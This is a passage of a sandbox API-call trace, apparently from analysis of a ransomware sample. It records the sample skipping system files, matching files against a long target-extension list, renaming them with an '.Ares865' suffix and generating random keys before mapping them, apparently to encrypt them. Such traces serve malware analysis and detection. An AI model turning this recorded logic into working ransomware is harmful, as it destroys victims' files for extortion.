dwReserved1=0x0, cFileName="MS.OUTLOOK.DEV.14.1033.hxn", cAlternateFileName="MSOUTL~2.HXN")) returned 1 [0083.518] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.518] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.518] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".") returned 1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="..") returned 1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="windows") returned -1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="temp") returned -1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="boot") returned 1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="perflogs") returned -1 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.519] lstrlenW (lpString="MS.OUTLOOK.DEV.14.1033.hxn") returned 26 [0083.519] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn") returned 56 [0083.519] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.OUTLOOK.DEV.14.1033.hxn" | out: lpString1="MS.OUTLOOK.DEV.14.1033.hxn") returned="MS.OUTLOOK.DEV.14.1033.hxn" [0083.519] lstrlenW (lpString="MS.OUTLOOK.DEV.14.1033.hxn") returned 26 [0083.519] lstrlenW (lpString="Ares865") returned 7 [0083.519] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.519] lstrlenW (lpString=".dll") returned 4 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".dll") returned 1 [0083.519] lstrlenW (lpString=".lnk") returned 4 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".lnk") returned 1 [0083.519] lstrlenW (lpString=".ini") returned 4 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".ini") returned 1 [0083.519] lstrlenW (lpString=".sys") returned 4 [0083.519] lstrcmpiW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".sys") returned 1 [0083.519] lstrlenW (lpString="MS.OUTLOOK.DEV.14.1033.hxn") returned 26 [0083.519] lstrlenW (lpString="bak") returned 3 [0083.519] lstrcmpiW (lpString1="hxn", lpString2="bak") returned 1 [0083.519] lstrlenW (lpString="ba_") returned 3 [0083.519] lstrcmpiW (lpString1="hxn", lpString2="ba_") returned 1 [0083.519] lstrlenW (lpString="dbb") returned 3 [0083.519] lstrcmpiW (lpString1="hxn", lpString2="dbb") returned 1 [0083.519] lstrlenW (lpString="vmdk") returned 4 [0083.519] lstrcmpiW (lpString1=".hxn", lpString2="vmdk") returned -1 [0083.519] lstrlenW (lpString="rar") returned 3 [0083.519] lstrcmpiW (lpString1="hxn", lpString2="rar") returned -1 [0083.519] lstrlenW (lpString="zip") returned 3 [0083.519] lstrcmpiW (lpString1="hxn", lpString2="zip") returned -1 [0083.519] lstrlenW (lpString="tgz") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="tgz") returned -1 [0083.520] lstrlenW (lpString="vbox") returned 4 [0083.520] lstrcmpiW (lpString1=".hxn", lpString2="vbox") returned -1 [0083.520] lstrlenW (lpString="vdi") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="vdi") returned -1 [0083.520] lstrlenW (lpString="vhd") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="vhd") returned -1 [0083.520] lstrlenW (lpString="vhdx") returned 4 [0083.520] lstrcmpiW (lpString1=".hxn", lpString2="vhdx") returned -1 [0083.520] lstrlenW (lpString="avhd") returned 4 [0083.520] lstrcmpiW (lpString1=".hxn", lpString2="avhd") returned -1 [0083.520] lstrlenW (lpString="db") returned 2 [0083.520] lstrcmpiW (lpString1="xn", lpString2="db") returned 1 [0083.520] lstrlenW (lpString="db2") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="db2") returned 1 [0083.520] lstrlenW (lpString="db3") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="db3") returned 1 [0083.520] lstrlenW (lpString="dbf") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="dbf") returned 1 [0083.520] lstrlenW (lpString="mdf") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="mdf") returned -1 [0083.520] lstrlenW (lpString="mdb") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="mdb") returned -1 [0083.520] lstrlenW (lpString="sql") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="sql") returned -1 [0083.520] lstrlenW (lpString="sqlite") returned 6 [0083.520] lstrcmpiW (lpString1="33.hxn", lpString2="sqlite") returned -1 [0083.520] lstrlenW (lpString="sqlite3") returned 7 [0083.520] lstrcmpiW (lpString1="033.hxn", lpString2="sqlite3") returned -1 [0083.520] lstrlenW (lpString="sqlitedb") returned 8 [0083.520] lstrcmpiW (lpString1="1033.hxn", lpString2="sqlitedb") returned -1 [0083.520] lstrlenW (lpString="xml") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="xml") returned -1 [0083.520] lstrlenW (lpString="$er") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="$er") returned 1 [0083.520] lstrlenW (lpString="4dd") returned 3 [0083.520] lstrcmpiW (lpString1="hxn", lpString2="4dd") returned 1 [0083.520] lstrlenW (lpString="4dl") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="4dl") returned 1 [0083.521] lstrlenW (lpString="^^^") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="^^^") returned 1 [0083.521] lstrlenW (lpString="abs") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="abs") returned 1 [0083.521] lstrlenW (lpString="abx") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="abx") returned 1 [0083.521] lstrlenW (lpString="accdb") returned 5 [0083.521] lstrcmpiW (lpString1="3.hxn", lpString2="accdb") returned -1 [0083.521] lstrlenW (lpString="accdc") returned 5 [0083.521] lstrcmpiW (lpString1="3.hxn", lpString2="accdc") returned -1 [0083.521] lstrlenW (lpString="accde") returned 5 [0083.521] lstrcmpiW (lpString1="3.hxn", lpString2="accde") returned -1 [0083.521] lstrlenW (lpString="accdr") returned 5 [0083.521] lstrcmpiW (lpString1="3.hxn", lpString2="accdr") returned -1 [0083.521] lstrlenW (lpString="accdt") returned 5 [0083.521] lstrcmpiW (lpString1="3.hxn", lpString2="accdt") returned -1 [0083.521] lstrlenW (lpString="accdw") returned 5 [0083.521] lstrcmpiW (lpString1="3.hxn", lpString2="accdw") returned -1 [0083.521] lstrlenW (lpString="accft") returned 5 [0083.521] lstrcmpiW (lpString1="3.hxn", lpString2="accft") returned -1 [0083.521] lstrlenW (lpString="adb") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.521] lstrlenW (lpString="adb") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="adb") returned 1 [0083.521] lstrlenW (lpString="ade") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="ade") returned 1 [0083.521] lstrlenW (lpString="adf") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="adf") returned 1 [0083.521] lstrlenW (lpString="adn") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="adn") returned 1 [0083.521] lstrlenW (lpString="adp") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="adp") returned 1 [0083.521] lstrlenW (lpString="alf") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="alf") returned 1 [0083.521] lstrlenW (lpString="ask") returned 3 [0083.521] lstrcmpiW (lpString1="hxn", lpString2="ask") returned 1 [0083.521] lstrlenW (lpString="btr") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="btr") returned 1 [0083.522] lstrlenW (lpString="cat") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="cat") returned 1 [0083.522] lstrlenW (lpString="cdb") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="cdb") returned 1 [0083.522] lstrlenW (lpString="ckp") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="ckp") returned 1 [0083.522] lstrlenW (lpString="cma") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="cma") returned 1 [0083.522] lstrlenW (lpString="cpd") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="cpd") returned 1 [0083.522] lstrlenW (lpString="dacpac") returned 6 [0083.522] lstrcmpiW (lpString1="33.hxn", lpString2="dacpac") returned -1 [0083.522] lstrlenW (lpString="dad") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="dad") returned 1 [0083.522] lstrlenW (lpString="dadiagrams") returned 10 [0083.522] lstrcmpiW (lpString1="4.1033.hxn", lpString2="dadiagrams") returned -1 [0083.522] lstrlenW (lpString="daschema") returned 8 [0083.522] lstrcmpiW (lpString1="1033.hxn", lpString2="daschema") returned -1 [0083.522] lstrlenW (lpString="db-journal") returned 10 [0083.522] lstrcmpiW (lpString1="4.1033.hxn", lpString2="db-journal") returned -1 [0083.522] lstrlenW (lpString="db-shm") returned 6 [0083.522] lstrcmpiW (lpString1="33.hxn", lpString2="db-shm") returned -1 [0083.522] lstrlenW (lpString="db-wal") returned 6 [0083.522] lstrcmpiW (lpString1="33.hxn", lpString2="db-wal") returned -1 [0083.522] lstrlenW (lpString="dbc") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="dbc") returned 1 [0083.522] lstrlenW (lpString="dbs") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="dbs") returned 1 [0083.522] lstrlenW (lpString="dbt") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="dbt") returned 1 [0083.522] lstrlenW (lpString="dbv") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="dbv") returned 1 [0083.522] lstrlenW (lpString="dbx") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="dbx") returned 1 [0083.522] lstrlenW (lpString="dcb") returned 3 [0083.522] lstrcmpiW (lpString1="hxn", lpString2="dcb") returned 1 [0083.523] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.Ares865") returned 68 [0083.523] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.524] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.outlook.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.524] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=362) returned 1 [0083.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.524] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.525] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.525] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.525] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.525] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x15c [0083.527] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x470) returned 0x190000 [0083.528] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.528] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.529] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.529] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.529] CloseHandle (hObject=0x15c) returned 1 [0083.529] CloseHandle (hObject=0x118) returned 1 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.529] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.530] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.14.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2=".") returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="..") returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="windows") returned -1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="temp") returned -1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="boot") returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="perflogs") returned -1 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.530] lstrlenW (lpString="MS.POWERPNT.14.1033.hxn") returned 23 [0083.530] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn") returned 60 [0083.530] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.POWERPNT.14.1033.hxn" | out: lpString1="MS.POWERPNT.14.1033.hxn") returned="MS.POWERPNT.14.1033.hxn" [0083.530] lstrlenW (lpString="MS.POWERPNT.14.1033.hxn") returned 23 [0083.530] lstrlenW (lpString="Ares865") returned 7 [0083.530] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.530] lstrlenW (lpString=".dll") returned 4 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2=".dll") returned 1 [0083.530] lstrlenW (lpString=".lnk") returned 4 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2=".lnk") returned 1 [0083.530] lstrlenW (lpString=".ini") returned 4 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2=".ini") returned 1 [0083.530] lstrlenW (lpString=".sys") returned 4 [0083.530] lstrcmpiW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2=".sys") returned 1 [0083.530] lstrlenW (lpString="MS.POWERPNT.14.1033.hxn") returned 23 [0083.531] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.Ares865") returned 65 [0083.531] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.532] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.532] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=344) returned 1 [0083.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.532] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.532] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.533] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.533] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.534] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x460, lpName=0x0) returned 0x15c [0083.535] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x460) returned 0x190000 [0083.536] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.537] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.537] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.537] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.537] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.537] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.537] CloseHandle (hObject=0x15c) returned 1 [0083.537] CloseHandle (hObject=0x118) returned 1 [0083.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.538] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.538] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.DEV.14.1033.hxn", cAlternateFileName="MSPOWE~2.HXN")) returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="aoldtz.exe") returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2=".") returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="..") returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="windows") returned -1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="bootmgr") returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="temp") returned -1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="pagefile.sys") returned -1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="boot") returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="ids.txt") returned 1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="ntuser.dat") returned -1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="perflogs") returned -1 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="MSBuild") returned -1 [0083.538] lstrlenW (lpString="MS.POWERPNT.DEV.14.1033.hxn") returned 27 [0083.538] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.14.1033.hxn") returned 57 [0083.538] lstrcpyW (in: lpString1=0x2cce444, lpString2="MS.POWERPNT.DEV.14.1033.hxn" | out: lpString1="MS.POWERPNT.DEV.14.1033.hxn") returned="MS.POWERPNT.DEV.14.1033.hxn" [0083.538] lstrlenW (lpString="MS.POWERPNT.DEV.14.1033.hxn") returned 27 [0083.538] lstrlenW (lpString="Ares865") returned 7 [0083.538] lstrcmpiW (lpString1="033.hxn", lpString2="Ares865") returned -1 [0083.538] lstrlenW (lpString=".dll") returned 4 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2=".dll") returned 1 [0083.538] lstrlenW (lpString=".lnk") returned 4 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2=".lnk") returned 1 [0083.538] lstrlenW (lpString=".ini") returned 4 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2=".ini") returned 1 [0083.538] lstrlenW (lpString=".sys") returned 4 [0083.538] lstrcmpiW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2=".sys") returned 1 [0083.539] lstrlenW (lpString="MS.POWERPNT.DEV.14.1033.hxn") returned 27 [0083.539] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.Ares865") returned 69 [0083.539] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.ares865"), dwFlags=0x1) returned 1 [0083.540] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.Ares865" (normalized: "c:\\users\\all users\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.540] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=368) returned 1 [0083.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.540] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.540] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.541] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.541] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.541] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x470, lpName=0x0) returned 0x15c [0083.543] MapViewOfFile (hFileMappingObject=0x15c, 